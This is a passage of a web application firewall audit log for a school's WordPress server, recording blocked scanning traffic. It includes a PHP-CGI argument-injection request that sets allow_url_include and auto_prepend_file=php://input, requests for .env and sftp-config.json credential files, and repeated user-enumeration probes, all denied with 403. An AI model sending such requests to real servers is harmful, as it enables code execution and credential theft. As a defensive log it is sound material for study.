https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.77.152.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.77.152.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4329112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4329112-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748533665353009 2803 (- - -) Stopwatch2: 1748533665353009 2803; combined=1274, p1=464, p2=780, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4329112-Z-- --a1b2dd5f-A-- [30/May/2025:00:10:39 +0700] aDiVD31Ye2lUDKzW1Lv3vAAAABQ 103.236.140.4 48132 103.236.140.4 8181 --a1b2dd5f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 222.252.8.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 222.252.8.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a1b2dd5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1b2dd5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748538639677230 2869 (- - -) Stopwatch2: 1748538639677230 2869; combined=1401, p1=451, p2=919, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1b2dd5f-Z-- --994f7e62-A-- [30/May/2025:00:31:48 +0700] aDiaBP4vV4CoZ0MKLMMH7AAAAJE 103.236.140.4 53022 103.236.140.4 8181 --994f7e62-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 113.56.161.14 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 113.56.161.14 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --994f7e62-C-- --994f7e62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --994f7e62-E-- --994f7e62-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748539908781380 4634 (- - -) Stopwatch2: 1748539908781380 4634; combined=3295, p1=501, p2=2759, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --994f7e62-Z-- --53461543-A-- [30/May/2025:00:45:15 +0700] aDidK8X5pbyFXv2T3iqGggAAANY 103.236.140.4 57756 103.236.140.4 8181 --53461543-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.156.104.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.156.104.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --53461543-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53461543-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748540715670960 2864 (- - -) Stopwatch2: 1748540715670960 2864; combined=1302, p1=446, p2=826, p3=0, p4=0, p5=30, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53461543-Z-- --db17f30a-A-- [30/May/2025:01:04:55 +0700] aDihx2MaQtTb69S13pgizgAAAFg 103.236.140.4 32866 103.236.140.4 8181 --db17f30a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 52.221.179.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.221.179.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --db17f30a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db17f30a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748541895306964 2797 (- - -) Stopwatch2: 1748541895306964 2797; combined=1259, p1=428, p2=802, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db17f30a-Z-- --4b81dd23-A-- [30/May/2025:01:41:22 +0700] aDiqUn1Ye2lUDKzW1Lv9BQAAABc 103.236.140.4 34368 103.236.140.4 8181 --4b81dd23-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.176.195.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.176.195.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4b81dd23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b81dd23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748544082857302 3359 (- - -) Stopwatch2: 1748544082857302 3359; combined=1464, p1=458, p2=974, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b81dd23-Z-- --811c9765-A-- [30/May/2025:02:11:30 +0700] aDixYsX5pbyFXv2T3iqHXgAAANg 103.236.140.4 34502 103.236.140.4 8181 --811c9765-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --811c9765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --811c9765-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748545890097433 712 (- - -) Stopwatch2: 1748545890097433 712; combined=254, p1=217, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --811c9765-Z-- --0eef540f-A-- [30/May/2025:02:16:21 +0700] aDiyhf4vV4CoZ0MKLMMLWAAAAI8 103.236.140.4 34516 103.236.140.4 8181 --0eef540f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.82.134.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.82.134.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0eef540f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eef540f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748546181903235 2677 (- - -) Stopwatch2: 1748546181903235 2677; combined=1225, p1=405, p2=790, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eef540f-Z-- --34a50657-A-- [30/May/2025:02:29:58 +0700] aDi1tmMaQtTb69S13pgkOQAAAEI 103.236.140.4 40626 103.236.140.4 8181 --34a50657-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 3.22.68.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 3.22.68.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --34a50657-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34a50657-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748546998154929 2633 (- - -) Stopwatch2: 1748546998154929 2633; combined=1194, p1=419, p2=745, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34a50657-Z-- --8f69e53c-A-- [30/May/2025:02:56:04 +0700] aDi71GMaQtTb69S13pgkTQAAAEo 103.236.140.4 40760 103.236.140.4 8181 --8f69e53c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.224.145.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.224.145.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8f69e53c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f69e53c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748548564687563 3456 (- - -) Stopwatch2: 1748548564687563 3456; combined=1446, p1=464, p2=950, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f69e53c-Z-- --35307212-A-- [30/May/2025:03:00:16 +0700] aDi80P4vV4CoZ0MKLMMNWQAAAIw 103.236.140.4 40786 103.236.140.4 8181 --35307212-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.166.27.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.166.27.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --35307212-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35307212-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748548816201115 3131 (- - -) Stopwatch2: 1748548816201115 3131; combined=1327, p1=456, p2=835, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35307212-Z-- --dc54f705-A-- [30/May/2025:03:17:11 +0700] aDjAx2MaQtTb69S13pgkWQAAAFA 103.236.140.4 40926 103.236.140.4 8181 --dc54f705-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.162 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --dc54f705-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc54f705-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748549831836474 837 (- - -) Stopwatch2: 1748549831836474 837; combined=339, p1=297, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc54f705-Z-- --5bbe323d-A-- [30/May/2025:03:17:23 +0700] aDjA02MaQtTb69S13pgkWgAAAEk 103.236.140.4 40928 103.236.140.4 8181 --5bbe323d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.162 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5bbe323d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bbe323d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748549843913409 801 (- - -) Stopwatch2: 1748549843913409 801; combined=326, p1=283, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bbe323d-Z-- --bb46df2a-A-- [30/May/2025:03:22:28 +0700] aDjCBGMaQtTb69S13pgkZgAAAE0 103.236.140.4 40960 103.236.140.4 8181 --bb46df2a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.210.52.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.210.52.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bb46df2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb46df2a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748550148697805 2090 (- - -) Stopwatch2: 1748550148697805 2090; combined=1034, p1=330, p2=677, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb46df2a-Z-- --d9846b0c-A-- [30/May/2025:03:38:20 +0700] aDjFvLoQWz54N7DBUCchlQAAAQg 103.236.140.4 41664 103.236.140.4 8181 --d9846b0c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.72.72.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.72.72.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9846b0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9846b0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748551100561602 2794 (- - -) Stopwatch2: 1748551100561602 2794; combined=1223, p1=414, p2=779, p3=0, p4=0, p5=29, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9846b0c-Z-- --c4877e1c-A-- [30/May/2025:03:38:31 +0700] aDjFx7oQWz54N7DBUCchlwAAAQk 103.236.140.4 41670 103.236.140.4 8181 --c4877e1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.148.62.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.148.62.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4877e1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4877e1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748551111988080 2748 (- - -) Stopwatch2: 1748551111988080 2748; combined=1364, p1=471, p2=860, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4877e1c-Z-- --6d12771e-A-- [30/May/2025:03:40:09 +0700] aDjGKboQWz54N7DBUCchoAAAARQ 103.236.140.4 41694 103.236.140.4 8181 --6d12771e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.188 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6d12771e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d12771e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748551209963224 881 (- - -) Stopwatch2: 1748551209963224 881; combined=359, p1=319, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d12771e-Z-- --19cea60e-A-- [30/May/2025:04:13:57 +0700] aDjOFRNBDSvkc-tIZOnbyAAAAEs 103.236.140.4 41884 103.236.140.4 8181 --19cea60e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.214.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.214.110.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --19cea60e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19cea60e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 